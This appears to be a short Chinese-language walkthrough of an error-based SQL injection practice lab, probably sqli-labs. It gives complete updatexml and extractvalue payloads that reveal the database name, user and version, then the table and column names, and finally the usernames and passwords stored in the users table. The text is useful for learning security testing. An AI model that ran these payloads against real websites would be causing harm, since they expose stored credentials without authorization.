1、判断闭合方式
输入语句Dumb"和Dumb',进行加密,输入Dumb"时返回页面如下:
我们猜测闭合方式是:"。接下来进行下一步验证,输入语句Dumb"#
,进行加密,返回页面如下:
这说明闭合方式的确是"。
2、判断注入方式
我们在判断闭合方式时,发现该网站会返回报错。并且,没有回显。所以这次适合使用报错注入。
3、爆破数据库名、用户名、版本
输入语句
Dumb" and updatexml(1,concat('~',concat(database(),user(),version()),'~'),1)#
,进行加密,返回页面如下:
4、爆破数据表名
输入语句
Dumb" and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'))#
,进行加密,返回页面如下:
5、爆破列名
输入语句
Dumb" and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),'~'),1)#
,进行加密,返回页面如下:
6、爆破字段内容
输入语句
Dumb" and extractvalue(1,concat('~',mid((select group_concat(concat(id,'-',username,'-',password)) from users),1,21)))#
,进行加密,返回页面如下:
通过修改mid函数中的参数,可以看到没有显示出来的数据。